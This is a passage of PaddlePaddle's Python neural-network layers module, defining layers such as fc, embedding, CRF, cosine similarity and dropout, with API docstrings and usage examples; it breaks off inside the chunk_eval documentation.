the-stack_0_3685 | # Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
All layers related to the neural network.
"""
from __future__ import print_function
import os
import inspect
import warnings
import numpy as np
import six
import paddle
from ..layer_helper import LayerHelper
from ..initializer import Normal, Constant, NumpyArrayInitializer
from ..framework import Variable, OpProtoHolder, in_dygraph_mode, dygraph_only, _dygraph_tracer, default_main_program
from .. import dygraph_utils
from ..param_attr import ParamAttr
from .layer_function_generator import autodoc, templatedoc, _generate_doc_string_
from .tensor import concat, assign, fill_constant, zeros, tensor_array_to_tensor
from . import utils
from .. import unique_name
from functools import reduce
from .. import core
from ..data_feeder import convert_dtype, check_variable_and_dtype, check_type, check_dtype
import paddle
__all__ = [
'fc',
'embedding',
'linear_chain_crf',
'crf_decoding',
'cos_sim',
'chunk_eval',
'conv2d',
'conv3d',
'softmax',
'pool2d',
'pool3d',
'adaptive_pool2d',
'adaptive_pool3d',
'batch_norm',
'inplace_abn',
'instance_norm',
'data_norm',
'conv2d_transpose',
'conv3d_transpose',
'reduce_sum',
'reduce_mean',
'reduce_max',
'reduce_min',
'reduce_prod',
'reduce_all',
'reduce_any',
'dropout',
'split',
'ctc_greedy_decoder',
'l2_normalize',
'matmul',
'topk',
'transpose',
'im2sequence',
'row_conv',
'multiplex',
'layer_norm',
'group_norm',
'spectral_norm',
'smooth_l1',
'one_hot',
'autoincreased_step_counter',
'reshape',
'squeeze',
'unsqueeze',
'lod_reset',
'lod_append',
'lrn',
'pad',
'pad_constant_like',
'label_smooth',
'roi_pool',
'roi_align',
'dice_loss',
'image_resize',
'image_resize_short',
'resize_bilinear',
'resize_trilinear',
'resize_nearest',
'gather',
'gather_nd',
'scatter',
'scatter_nd_add',
'scatter_nd',
'random_crop',
'mean_iou',
'relu',
'selu',
'log',
'crop',
'crop_tensor',
'elu',
'relu6',
'pow',
'stanh',
'hard_sigmoid',
'swish',
'prelu',
'brelu',
'leaky_relu',
'soft_relu',
'flatten',
'stack',
'pad2d',
'unstack',
'unique',
'unique_with_counts',
'expand',
'expand_as',
'scale',
'elementwise_add',
'elementwise_div',
'elementwise_sub',
'elementwise_mul',
'elementwise_max',
'elementwise_min',
'elementwise_pow',
'elementwise_mod',
'elementwise_floordiv',
'uniform_random_batch_size_like',
'gaussian_random',
'sampling_id',
'gaussian_random_batch_size_like',
'sum',
'slice',
'strided_slice',
'shape',
'rank',
'size',
'logical_and',
'logical_or',
'logical_xor',
'logical_not',
'clip',
'clip_by_norm',
'mean',
'mul',
'maxout',
'space_to_depth',
'affine_grid',
'affine_channel',
'similarity_focus',
'hash',
'grid_sampler',
'log_loss',
'add_position_encoding',
'bilinear_tensor_product',
'merge_selected_rows',
'get_tensor_from_selected_rows',
'shuffle_channel',
'temporal_shift',
'py_func',
'psroi_pool',
'prroi_pool',
'pixel_shuffle',
'fsp_matrix',
'continuous_value_model',
'where',
'sign',
'deformable_conv',
'unfold',
'deformable_roi_pooling',
'filter_by_instag',
'shard_index',
'hard_swish',
'gather_tree',
'uniform_random',
]
@dygraph_only
def _elementwise_op_in_dygraph(x,
y,
axis=-1,
act=None,
use_mkldnn=False,
op_name=None):
op = getattr(core.ops, op_name)
out = op(x, y, 'axis', axis, 'use_mkldnn', use_mkldnn)
return dygraph_utils._append_activation_in_dygraph(
out, act, use_mkldnn=use_mkldnn)
def fc(input,
size,
num_flatten_dims=1,
param_attr=None,
bias_attr=None,
act=None,
name=None):
"""
**Fully Connected Layer**
This operator creates a fully connected layer in the network. It can take
a Tensor(or LoDTensor) or a list of Tensor(or LoDTensor) as its inputs(see
Args in detail). It creates a variable called weight for each input Tensor,
which represents a fully connected weight matrix from each input unit to
each output unit. The fully connected layer multiplies each input Tensor
with its corresponding weight to produce an output Tensor with shape :math:`[M, size]` ,
where M is batch size. If a list of Tensor is given, the results of
multiple output Tensors with shape :math:`[M, size]` will be summed up. If :attr:`bias_attr`
is not None, a bias variable will be created and added to the output.
Finally, if :attr:`act` is not None, it will be applied to the output as well.
When the input is a single Tensor(or LoDTensor):
.. math::
Out = Act({XW + b})
When the input is a list of Tensor(or LoDTensor):
.. math::
Out = Act({\sum_{i=0}^{N-1}X_iW_i + b})
In the above equation:
* :math:`N`: Number of the input. N equals to len(input) if input is list of Variable.
* :math:`X_i`: The i-th input tensor.
* :math:`W_i`: The i-th weights matrix corresponding i-th input tensor.
* :math:`b`: The bias parameter created by this layer (if needed).
* :math:`Act`: The activation function.
* :math:`Out`: The output Tensor.
.. code-block:: text
Case 1:
Given a single Tensor data_1, and num_flatten_dims = 2:
data_1.data = [[[0.1, 0.2],
[0.3, 0.4]]]
data_1.shape = (1, 2, 2) # 1 is batch_size
out = fluid.layers.fc(input=data_1, size=1, num_flatten_dims=2)
Then output is:
out.data = [[0.83234344], [0.34936576]]
out.shape = (1, 2, 1)
Case 2:
Given a list of Tensor:
data_1.data = [[[0.1, 0.2],
[0.3, 0.4]]]
data_1.shape = (1, 2, 2) # 1 is batch_size
data_2 = [[[0.1, 0.2, 0.3]]]
data_2.shape = (1, 1, 3)
out = fluid.layers.fc(input=[data_1, data_2], size=2)
Then:
out.data = [[0.18669507, 0.1893476]]
out.shape = (1, 2)
Args:
input (Variable|list of Variable): A Tensor(or LoDTensor) with shape :math:`[N_1, N_2,..., N_k]` or
a list of Tensor(or LoDTensor). The dimensions of the input Tensor is at least 2 and the data
type should be float32 or float64.
size(int): The number of output units in this layer, which also means the feature size of output
Tensor(or LoDTensor).
num_flatten_dims (int): The fc layer can accept an input Tensor with more than
two dimensions. If this happens, the multidimensional tensor will first be flattened
into a 2-D matrix. The parameter :attr:`num_flatten_dims` determines how the input
Tensor is flattened: the first :attr:`num_flatten_dims` (inclusive, index starts from 1)
dimensions will be flatten to form the first dimension of the final matrix (height of
the matrix), and the rest :math:`rank(X) - num\_flatten\_dims` dimensions are flattened to
form the second dimension of the final matrix (width of the matrix). For example, assuming that
X is a 5-dimensional Tensor with a shape [2, 3, 4, 5, 6], and :attr:`num_flatten_dims` = 3.
Then, the flattened matrix will have a shape [2 x 3 x 4, 5 x 6] = [24, 30]. Default: 1.
param_attr (ParamAttr): To specify the weight parameter property. Default: None, which means the
default weight parameter property is used. See usage for details in :ref:`api_fluid_ParamAttr` .
bias_attr (ParamAttr): To specify the bias parameter property. Default: None, which means the
default bias parameter property is used. See usage for details in :ref:`api_fluid_ParamAttr` .
act (str): Activation to be applied to the output of this layer, such as tanh, softmax,
sigmoid, relu. For more information, please refer to :ref:`api_guide_activations_en` . Default: None.
name (str, optional): The default value is None. Normally there is no need for user to set this property.
For more information, please refer to :ref:`api_guide_Name` .
Returns:
Variable: Tensor or LoDTensor calculated by fc layer. The data type is same with input.
Raises:
ValueError: If dimensions of the input Tensor is less than 2.
Examples:
.. code-block:: python
import paddle.fluid as fluid
# when input is single tensor
data = fluid.data(name="data", shape=[-1, 32], dtype="float32")
fc = fluid.layers.fc(input=data, size=1000, act="tanh")
# when input are multiple tensors
data_1 = fluid.data(name="data_1", shape=[-1, 32], dtype="float32")
data_2 = fluid.data(name="data_2", shape=[-1, 36], dtype="float32")
fc = fluid.layers.fc(input=[data_1, data_2], size=1000, act="tanh")
"""
helper = LayerHelper("fc", **locals())
check_type(input, 'input', (list, tuple, Variable), 'fc')
if isinstance(input, (list, tuple)):
for i, input_x in enumerate(input):
check_type(input_x, 'input[' + str(i) + ']', Variable, 'fc')
dtype = helper.input_dtype()
check_dtype(dtype, 'input', ['float16', 'float32', 'float64'], 'fc')
mul_results = []
for input_var, param_attr in helper.iter_inputs_and_params():
input_shape = input_var.shape
if num_flatten_dims == -1:
num_flatten_dims = len(input_shape) - 1
param_shape = [
reduce(lambda a, b: a * b, input_shape[num_flatten_dims:], 1)
] + [size]
w = helper.create_parameter(
attr=param_attr, shape=param_shape, dtype=dtype, is_bias=False)
tmp = helper.create_variable_for_type_inference(dtype)
helper.append_op(
type="mul",
inputs={"X": input_var,
"Y": w},
outputs={"Out": tmp},
attrs={"x_num_col_dims": num_flatten_dims,
"y_num_col_dims": 1})
mul_results.append(tmp)
if len(mul_results) == 1:
pre_bias = mul_results[0]
else:
pre_bias = helper.create_variable_for_type_inference(dtype)
helper.append_op(
type="sum",
inputs={"X": mul_results},
outputs={"Out": pre_bias},
attrs={"use_mkldnn": False})
# add bias
pre_activation = helper.append_bias_op(pre_bias, dim_start=num_flatten_dims)
# add activation
return helper.append_activation(pre_activation)
def embedding(input,
size,
is_sparse=False,
is_distributed=False,
padding_idx=None,
param_attr=None,
dtype='float32'):
"""
    **WARNING:** This OP will be deprecated in a future release. This OP requires the
last dimension of Tensor shape must be equal to 1. It is recommended to use
fluid. :ref:`api_fluid_embedding` .
    The operator is used to look up the embedding vectors of the ids provided by :attr:`input` .
It automatically constructs a 2D embedding matrix based on the
input :attr:`size` (vocab_size, emb_size) and :attr:`dtype` .
This OP requires the last dimension of Tensor shape must be equal to 1. The shape
of output Tensor is generated by replacing the last dimension of the input Tensor shape
with emb_size.
    **Note:** The id in :attr:`input` must satisfy :math:`0 <= id < size[0]` ,
otherwise the program will throw an exception and exit.
.. code-block:: text
Case 1:
input is a Tensor. padding_idx = -1
input.data = [[[1], [3]], [[2], [4]], [[4], [127]]]
input.shape = [3, 2, 1]
Given size = [128, 16]
output is a Tensor:
out.shape = [3, 2, 16]
out.data = [[[0.129435295, 0.244512452, ..., 0.436322452],
[0.345421456, 0.524563927, ..., 0.144534654]],
[[0.345249859, 0.124939536, ..., 0.194353745],
[0.945345345, 0.435394634, ..., 0.435345365]],
[[0.945345345, 0.435394634, ..., 0.435345365],
[0.0, 0.0, ..., 0.0 ]]] # padding data
            Since the input padding_idx is less than 0, it is automatically converted to padding_idx = -1 + 128 = 127.
It will pad all-zero data when ids is 127.
Case 2:
input is a LoDTensor with 1-level LoD. padding_idx = 0
input.lod = [[2, 3]]
input.data = [[1], [3], [2], [4], [0]]
input.shape = [5, 1]
Given size = [128, 16]
output is a LoDTensor:
out.lod = [[2, 3]]
out.shape = [5, 16]
out.data = [[0.129435295, 0.244512452, ..., 0.436322452],
[0.345421456, 0.524563927, ..., 0.144534654],
[0.345249859, 0.124939536, ..., 0.194353745],
[0.945345345, 0.435394634, ..., 0.435345365],
[0.0, 0.0, ..., 0.0 ]] # padding data
It will pad all-zero data when ids is 0.
Args:
input(Variable): A Tensor or LoDTensor with type int64, which contains the id information.
The last dimension of Tensor shape must be equal to 1. The value of the input id should
satisfy :math:`0<= id < size[0]` .
size(tuple|list): The shape of lookup table parameter. It should have two elements which
indicates the size of the dictionary of embeddings and the size of each embedding vector respectively.
is_sparse(bool): The flag indicating whether to use sparse update. This parameter only
affects the performance of the backwards gradient update. It is recommended to set
True because sparse update is faster. But some optimizer does not support sparse update,
such as :ref:`api_fluid_optimizer_AdadeltaOptimizer` , :ref:`api_fluid_optimizer_AdamaxOptimizer` ,
:ref:`api_fluid_optimizer_DecayedAdagradOptimizer` , :ref:`api_fluid_optimizer_FtrlOptimizer` ,
:ref:`api_fluid_optimizer_LambOptimizer` and :ref:`api_fluid_optimizer_LarsMomentumOptimizer` .
In these case, is_sparse must be False. Default: False.
is_distributed(bool): Whether to store the embedding matrix in a distributed manner. Only used
in multi-machine distributed CPU training. Default: False.
padding_idx(int|long|None): padding_idx needs to be in the interval [-vocab_size, vocab_size).
If :math:`padding\_idx < 0`, the :math:`padding\_idx` will automatically be converted
to :math:`vocab\_size + padding\_idx` . It will output all-zero padding data whenever lookup
encounters :math:`padding\_idx` in id. And the padding data will not be updated while training.
If set None, it makes no effect to output. Default: None.
param_attr(ParamAttr): To specify the weight parameter property. Default: None, which means the
default weight parameter property is used. See usage for details in :ref:`api_fluid_ParamAttr` . In addition,
user-defined or pre-trained word vectors can be loaded with the :attr:`param_attr` parameter.
The local word vector needs to be transformed into numpy format, and the shape of local word
vector should be consistent with :attr:`size` . Then :ref:`api_fluid_initializer_NumpyArrayInitializer`
is used to load custom or pre-trained word vectors. See code example 2 for details.
dtype(str|core.VarDesc.VarType): It refers to the data type of output Tensor.
It must be float32 or float64. Default: float32.
Returns:
Variable: Embedding Tensor or LoDTensor mapped by input. The data type is the same as :attr:`dtype` .
Examples:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
data = fluid.data(name='x', shape=[None, 1], dtype='int64')
# example 1
emb_1 = fluid.embedding(input=data, size=[128, 64])
# example 2: load custom or pre-trained word vectors
weight_data = np.random.random(size=(128, 100)) # word vectors with numpy format
w_param_attrs = fluid.ParamAttr(
name="emb_weight",
learning_rate=0.5,
initializer=fluid.initializer.NumpyArrayInitializer(weight_data),
trainable=True)
emb_2 = fluid.layers.embedding(input=data, size=(128, 100), param_attr=w_param_attrs, dtype='float32')
"""
helper = LayerHelper('embedding', **locals())
check_variable_and_dtype(input, 'input', ['int64'],
'fluid.layers.embedding')
check_dtype(dtype, 'dtype', ['float16', 'float32', 'float64'],
'fluid.layers.embedding')
remote_prefetch = is_sparse and (not is_distributed)
if remote_prefetch:
assert is_sparse is True and is_distributed is False
w = helper.create_parameter(
attr=helper.param_attr, shape=size, dtype=dtype, is_bias=False)
tmp = helper.create_variable_for_type_inference(dtype)
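    # Normalize padding_idx: None disables padding (the op uses -1 as a
    # sentinel), non-negative values pass through unchanged, and negative
    # values wrap around to size[0] + padding_idx (e.g. -1 with size[0] == 128
    # becomes 127, matching the docstring example above).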
padding_idx = -1 if padding_idx is None else padding_idx if padding_idx >= 0 else (
size[0] + padding_idx)
helper.append_op(
type='lookup_table',
inputs={'Ids': input,
'W': w},
outputs={'Out': tmp},
attrs={
'is_sparse': is_sparse,
'is_distributed': is_distributed,
'remote_prefetch': remote_prefetch,
'padding_idx': padding_idx
})
return tmp
def _pull_sparse(input,
size,
table_id,
accessor_class,
name="embedding",
ctr_label_name="",
padding_id=0,
dtype='float32',
scale_sparse_grad=True):
"""
**Pull Fleet Sparse Layer**
This layer is used to lookup embeddings of IDs, provided by :attr:`input`, in
Fleet lookup table. The result of this lookup is the embedding of each ID in the
:attr:`input`.
Args:
input(Variable|list of Variable): Input is a Tensor<int64> Variable, which
contains the IDs information.
size(int): The embedding size parameter, which indicates the size of
each embedding vector respectively.
table_id(int): the fleet table id of this embedding.
accessor_class(str): the pslib accessor of the table, default is DownpourCtrAccessor.
ctr_label_name(str): the layer name of click.
padding_id(int): the padding id during lookup, default is 0.
dtype(str): The dtype refers to the data type of output tensor. Only supports
float32 now.
scale_sparse_grad(bool): whether to scale sparse gradient with batch size. default
is True.
Returns:
Variable|list of Variable: The tensor variable storing the embeddings of the \
supplied inputs.
Examples:
.. code-block:: python
import paddle.fluid as fluid
data = fluid.layers.data(name='sequence', shape=[1], dtype='int64', lod_level=1)
emb = fluid.layers.nn._pull_sparse(
input=data, size=11, table_id=0, accessor_class="DownpourCtrAccessor")
"""
helper = LayerHelper(name, **locals())
inputs = helper.multiple_input()
outs = [helper.create_variable_for_type_inference(dtype)]
input_names = [i.name for i in inputs]
attrs = {
'EmbeddingDim': size,
'TableId': table_id,
'AccessorClass': accessor_class,
'CtrLabelName': ctr_label_name,
'PaddingId': padding_id,
'ScaleSparseGrad': scale_sparse_grad,
'InputNames': input_names,
# this is only for compatible with embedding op
'is_distributed': True
}
# this is only for compatible with embedding op
w, _ = helper.create_or_get_global_variable(
name=name, shape=[size], dtype=dtype, is_bias=False, persistable=True)
helper.append_op(
type='pull_sparse',
inputs={'Ids': inputs,
'W': w},
outputs={'Out': outs},
attrs=attrs)
if len(outs) == 1:
return outs[0]
return outs
def _pull_sparse_v2(input,
size,
table_id,
accessor_class,
name="embedding",
ctr_label_name="",
padding_id=0,
dtype='float32',
scale_sparse_grad=True):
"""
**Pull Fleet Sparse Layer**
This layer is used to lookup embeddings of IDs, provided by :attr:`input`, in
Fleet lookup table. The result of this lookup is the embedding of each ID in the
:attr:`input`.
Args:
input(Variable|list of Variable): Input is a Tensor<int64> Variable, which
contains the IDs information.
size(int): The embedding size parameter, which indicates the size of
each embedding vector respectively.
table_id(int): the pslib table id of this embedding.
accessor_class(str): the fleet accessor of the table, default is DownpourCtrAccessor.
ctr_label_name(str): the layer name of click.
padding_id(int): the padding id during lookup, default is 0.
dtype(str): The dtype refers to the data type of output tensor. Only supports
float32 now.
scale_sparse_grad(bool): whether to scale sparse gradient with batch size. default
is True.
Returns:
Variable|list of Variable: The tensor variable storing the embeddings of the \
supplied inputs.
Examples:
.. code-block:: python
import paddle.fluid as fluid
data = fluid.layers.data(name='sequence', shape=[1], dtype='int64', lod_level=1)
emb = fluid.layers.nn._pull_sparse_v2(
input=data, size=11, table_id=0, accessor_class="DownpourCtrAccessor")
"""
helper = LayerHelper(name, **locals())
inputs = helper.multiple_input()
outs = [helper.create_variable_for_type_inference(dtype)]
input_names = [i.name for i in inputs]
attrs = {
'EmbeddingDim': size,
'TableId': table_id,
'AccessorClass': accessor_class,
'CtrLabelName': ctr_label_name,
'PaddingId': padding_id,
'ScaleSparseGrad': scale_sparse_grad,
'InputNames': input_names,
# this is only for compatible with embedding op
'is_distributed': True
}
# this is only for compatible with embedding op
w, _ = helper.create_or_get_global_variable(
name=name, shape=[size], dtype=dtype, is_bias=False, persistable=True)
helper.append_op(
type='pull_sparse_v2',
inputs={'Ids': inputs,
'W': w},
outputs={'Out': outs},
attrs=attrs)
if len(outs) == 1:
return outs[0]
return outs
def _pull_box_sparse(input, size, dtype='float32'):
"""
**Pull Box Sparse Layer**
This layer is used to lookup embeddings of IDs, provided by :attr:`input`, in
BoxPS lookup table. The result of this lookup is the embedding of each ID in the
:attr:`input`.
Args:
input(Variable|list of Variable): Input is a Tensor<int64> Variable, which
contains the IDs information.
size(int): The embedding size parameter, which indicates the size of
each embedding vector respectively.
dtype(str): The dtype refers to the data type of output tensor. Only supports
float32 now.
Returns:
Variable|list of Variable: The tensor variable storing the embeddings of the \
supplied inputs.
Examples:
.. code-block:: python
import paddle.fluid as fluid
data = fluid.layers.data(name='sequence', shape=[1], dtype='int64', lod_level=1)
          emb = fluid.layers.nn._pull_box_sparse(input=data, size=11)
"""
helper = LayerHelper('pull_box_sparse', **locals())
if dtype != 'float32':
raise ValueError(
"BoxPS only support float type embedding now, and your type is: " +
dtype)
helper.input_dtype()
inputs = helper.multiple_input()
outs = [
helper.create_variable_for_type_inference(dtype)
for i in range(len(inputs))
]
helper.append_op(
type='pull_box_sparse',
inputs={'Ids': inputs},
outputs={'Out': outs},
attrs={'size': size})
if len(outs) == 1:
return outs[0]
return outs
@templatedoc()
def linear_chain_crf(input, label, param_attr=None, length=None):
"""
Linear Chain CRF.
${comment}
Args:
input(${emission_type}): ${emission_comment}
label(${label_type}): ${label_comment}
        length(${length_type}): ${length_comment}
param_attr(ParamAttr): The attribute of the learnable parameter for transition parameter.
Returns:
output(${emission_exps_type}): ${emission_exps_comment} \n
output(${transition_exps_type}): ${transition_exps_comment} \n
output(${log_likelihood_type}): ${log_likelihood_comment} \n
Examples:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
#define net structure, using LodTensor
train_program = fluid.Program()
startup_program = fluid.Program()
with fluid.program_guard(train_program, startup_program):
input_data = fluid.data(name='input_data', shape=[-1,10], dtype='float32')
label = fluid.data(name='label', shape=[-1,1], dtype='int')
emission= fluid.layers.fc(input=input_data, size=10, act="tanh")
crf_cost = fluid.layers.linear_chain_crf(
input=emission,
label=label,
param_attr=fluid.ParamAttr(
name='crfw',
learning_rate=0.01))
use_cuda = False
place = fluid.CUDAPlace(0) if use_cuda else fluid.CPUPlace()
exe = fluid.Executor(place)
exe.run(startup_program)
#define data, using LoDTensor
a = fluid.create_lod_tensor(np.random.rand(12,10).astype('float32'), [[3,3,4,2]], place)
b = fluid.create_lod_tensor(np.array([[1],[1],[2],[3],[1],[1],[1],[3],[1],[1],[1],[1]]),[[3,3,4,2]] , place)
feed1 = {'input_data':a,'label':b}
loss= exe.run(train_program,feed=feed1, fetch_list=[crf_cost])
print(loss)
#define net structure, using padding
train_program = fluid.Program()
startup_program = fluid.Program()
with fluid.program_guard(train_program, startup_program):
input_data2 = fluid.data(name='input_data2', shape=[-1,10,10], dtype='float32')
label2 = fluid.data(name='label2', shape=[-1,10,1], dtype='int')
label_length = fluid.data(name='length', shape=[-1,1], dtype='int')
emission2= fluid.layers.fc(input=input_data2, size=10, act="tanh", num_flatten_dims=2)
crf_cost2 = fluid.layers.linear_chain_crf(
input=emission2,
label=label2,
length=label_length,
param_attr=fluid.ParamAttr(
name='crfw',
learning_rate=0.01))
use_cuda = False
place = fluid.CUDAPlace(0) if use_cuda else fluid.CPUPlace()
exe = fluid.Executor(place)
exe.run(startup_program)
#define data, using padding
cc=np.random.rand(4,10,10).astype('float32')
dd=np.random.rand(4,10,1).astype('int64')
ll=np.array([[3],[3],[4],[2]])
feed2 = {'input_data2':cc,'label2':dd,'length':ll}
loss2= exe.run(train_program,feed=feed2, fetch_list=[crf_cost2])
print(loss2)
#[array([[ 7.8902354],
# [ 7.3602567],
# [ 10.004011],
# [ 5.86721 ]], dtype=float32)]
#you can use find_var to get transition parameter.
transition=np.array(fluid.global_scope().find_var('crfw').get_tensor())
print(transition)
"""
helper = LayerHelper('linear_chain_crf', **locals())
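    # With padded input (length given) the emission tensor is
    # [batch, max_len, num_tags], so the tag count is on axis 2; with LoDTensor
    # input it is [total_tokens, num_tags] and the tag count is on axis 1.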
size = input.shape[2] if length else input.shape[1]
transition = helper.create_parameter(
attr=helper.param_attr,
shape=[size + 2, size],
dtype=helper.input_dtype())
alpha = helper.create_variable_for_type_inference(
dtype=helper.input_dtype())
emission_exps = helper.create_variable_for_type_inference(
dtype=helper.input_dtype())
transition_exps = helper.create_variable_for_type_inference(
dtype=helper.input_dtype())
log_likelihood = helper.create_variable_for_type_inference(
dtype=helper.input_dtype())
this_inputs = {
"Emission": [input],
"Transition": transition,
"Label": [label]
}
if length:
this_inputs['Length'] = [length]
helper.append_op(
type='linear_chain_crf',
inputs=this_inputs,
outputs={
"Alpha": [alpha],
"EmissionExps": [emission_exps],
"TransitionExps": transition_exps,
"LogLikelihood": log_likelihood
})
return log_likelihood
@templatedoc()
def crf_decoding(input, param_attr, label=None, length=None):
"""
${comment}
Args:
input(${emission_type}): ${emission_comment}
param_attr (ParamAttr|None): To specify the weight parameter attribute.
Default: None, which means the default weight parameter property is
used. See usage for details in :ref:`api_fluid_ParamAttr` .
label(${label_type}, optional): ${label_comment}
length(${length_type}, optional): ${length_comment}
Returns:
Variable: ${viterbi_path_comment}
Examples:
.. code-block:: python
import paddle.fluid as fluid
# LoDTensor-based example
num_labels = 10
feature = fluid.data(name='word_emb', shape=[-1, 784], dtype='float32', lod_level=1)
label = fluid.data(name='label', shape=[-1, 1], dtype='int64', lod_level=1)
emission = fluid.layers.fc(input=feature, size=num_labels)
crf_cost = fluid.layers.linear_chain_crf(input=emission, label=label,
param_attr=fluid.ParamAttr(name="crfw"))
crf_decode = fluid.layers.crf_decoding(input=emission,
param_attr=fluid.ParamAttr(name="crfw"))
# Common tensor example
num_labels, max_len = 10, 20
feature = fluid.data(name='word_emb_pad', shape=[-1, max_len, 784], dtype='float32')
label = fluid.data(name='label_pad', shape=[-1, max_len, 1], dtype='int64')
length = fluid.data(name='length', shape=[-1, 1], dtype='int64')
emission = fluid.layers.fc(input=feature, size=num_labels,
num_flatten_dims=2)
crf_cost = fluid.layers.linear_chain_crf(input=emission, label=label, length=length,
param_attr=fluid.ParamAttr(name="crfw_pad"))
crf_decode = fluid.layers.crf_decoding(input=emission, length=length,
param_attr=fluid.ParamAttr(name="crfw_pad"))
"""
helper = LayerHelper('crf_decoding', **locals())
transition = helper.get_parameter(param_attr.name)
viterbi_path = helper.create_variable_for_type_inference(
dtype=helper.input_dtype())
inputs = {"Emission": [input], "Transition": transition, "Label": label}
if length:
inputs['Length'] = length
helper.append_op(
type='crf_decoding',
inputs=inputs,
outputs={"ViterbiPath": [viterbi_path]})
return viterbi_path
@templatedoc()
def cos_sim(X, Y):
"""
${comment}
Args:
X (Variable): ${x_comment}.
Y (Variable): ${y_comment}.
Returns:
A Variable holding LoDTensor representing the output of cosine(X, Y).
Examples:
.. code-block:: python
import paddle.fluid as fluid
x = fluid.data(name='x', shape=[3, 7], dtype='float32')
y = fluid.data(name='y', shape=[1, 7], dtype='float32')
out = fluid.layers.cos_sim(x, y)
"""
check_variable_and_dtype(X, 'X', ['float32'], 'cos_sim')
check_variable_and_dtype(Y, 'Y', ['float32'], 'cos_sim')
helper = LayerHelper('cos_sim', **locals())
out = helper.create_variable_for_type_inference(dtype=X.dtype)
xnorm = helper.create_variable_for_type_inference(dtype=X.dtype)
ynorm = helper.create_variable_for_type_inference(dtype=X.dtype)
helper.append_op(
type='cos_sim',
inputs={'X': [X],
'Y': [Y]},
outputs={'Out': [out],
'XNorm': [xnorm],
'YNorm': [ynorm]})
return out
def dropout(x,
dropout_prob,
is_test=False,
seed=None,
name=None,
dropout_implementation="downgrade_in_infer"):
"""
Computes dropout.
Drop or keep each element of `x` independently. Dropout is a regularization
technique for reducing overfitting by preventing neuron co-adaption during
training. The dropout operator randomly sets (according to the given dropout
    probability) the outputs of some units to zero, while others remain
unchanged.
dropout op can be removed from the program to make the program more efficient.
Args:
x (Variable): The input tensor variable. The data type is float16 or float32 or float64.
dropout_prob (float): Probability of setting units to zero.
        is_test (bool): A flag indicating whether it is in test phase or not.
seed (int): A Python integer used to create random seeds. If this
parameter is set to None, a random seed is used.
            NOTE: If an integer seed is given, the same output units will always
            be dropped. DO NOT use a fixed seed in training. Default: None.
name (str|None): A name for this layer(optional). If set None, the layer
will be named automatically.
dropout_implementation(string): ['downgrade_in_infer'(default)|'upscale_in_train']
1. downgrade_in_infer(default), downgrade the outcome at inference
- train: out = input * mask
- inference: out = input * (1.0 - dropout_prob)
(mask is a tensor same shape with input, value is 0 or 1
ratio of 0 is dropout_prob)
2. upscale_in_train, upscale the outcome at training time
- train: out = input * mask / ( 1.0 - dropout_prob )
- inference: out = input
(mask is a tensor same shape with input, value is 0 or 1
ratio of 0 is dropout_prob)
Returns:
A Variable holding Tensor representing the dropout, has same shape and data type with `x`.
Examples:
.. code-block:: python
import paddle.fluid as fluid
x = fluid.data(name="data", shape=[None, 32, 32], dtype="float32")
dropped = fluid.layers.dropout(x, dropout_prob=0.5)
"""
def get_attrs(prog, dropout_prob, is_test, seed):
if (seed is None or seed == 0) and prog.random_seed != 0:
seed = prog.random_seed
attrs = {
'dropout_prob': dropout_prob,
'is_test': is_test,
'fix_seed': seed is not None,
'seed': seed if seed is not None else 0,
'dropout_implementation': dropout_implementation,
}
return attrs
if in_dygraph_mode():
if (seed is None or
seed == 0) and default_main_program().random_seed != 0:
seed = default_main_program().random_seed
seed = seed if seed is not None else 0
_is_test = not _dygraph_tracer()._train_mode
out, mask = core.ops.dropout(x, 'dropout_prob', dropout_prob, 'is_test',
_is_test, 'fix_seed', seed is not None,
'seed', seed, 'dropout_implementation',
dropout_implementation)
return out
helper = LayerHelper('dropout', **locals())
check_variable_and_dtype(x, 'x', ['float16', 'float32', 'float64'],
'dropout')
out = helper.create_variable_for_type_inference(dtype=x.dtype)
mask = helper.create_variable_for_type_inference(
dtype=core.VarDesc.VarType.UINT8, stop_gradient=True)
attrs = get_attrs(helper.main_program, dropout_prob, is_test, seed)
helper.append_op(
type='dropout',
inputs={'X': [x]},
outputs={'Out': [out],
'Mask': [mask]},
attrs=attrs)
return out
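# A small numeric sketch (comments only, with assumed values) of the two
# dropout_implementation modes described above, using dropout_prob=0.5 and an
# input value of 2.0:
#   downgrade_in_infer: train -> 2.0 * mask               (either 0.0 or 2.0)
#                       infer -> 2.0 * (1.0 - 0.5) = 1.0
#   upscale_in_train:   train -> 2.0 * mask / (1.0 - 0.5) (either 0.0 or 4.0)
#                       infer -> 2.0                      (input is unchanged)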
@templatedoc()
def chunk_eval(input,
label,
chunk_scheme,
num_chunk_types,
excluded_chunk_types=None,
seq_length=None):
"""
This operator computes the precision, recall and F1-score for chunk detection.
It is often used in sequence tagging tasks, such as Named Entity Recognition(NER).
For some basics of chunking, please refer to
`Chunking with Support Vector Machines <https://aclanthology.info/pdf/N/N01/N01-1025.pdf>`_ .
This operator supports IOB, IOE, IOBES and IO (also known as plain) tagging schemes.
Here is a NER example for the usage of these tagging schemes:
.. code-block:: python
====== ====== ====== ===== == ============ ===== ===== ===== == =========
Li Ming works at Agricultural Bank of China in Beijing.
====== ====== ====== ===== == ============ ===== ===== ===== == =========
IO I-PER I-PER O O I-ORG I-ORG I-ORG I-ORG O I-LOC
IOB B-PER I-PER O O B-ORG I-ORG I-ORG I-ORG O B-LOC
IOE I-PER E-PER O O I-ORG I-ORG I-ORG E-ORG O E-LOC
IOBES B-PER E-PER O O I-ORG I-ORG I-ORG E-ORG O S-LOC
====== ====== ====== ===== == ============ ===== ===== ===== == =========
There are three chunk types(named entity types) including PER(person), ORG(organization)
and LOC(location), and we can see that the labels have the form `<tag type>-<chunk type>` .
Since the implementation of this operator actually uses label ids rather than
label strings, to make it work, there should be a way to map label ids to
tag types and chunk types. This operator uses the following way to do mapping:
.. code-block:: python
tag_type = label % num_tag_type
chunk_type = label / num_tag_type
where `num_tag_type` is the num of tag types in the tagging scheme, `num_chunk_type`
is the num of chunk types, and `tag_type` get its value from the following table.
.. code-block:: python
Scheme Begin Inside End Single
plain 0 - - -
IOB 0 1 - -
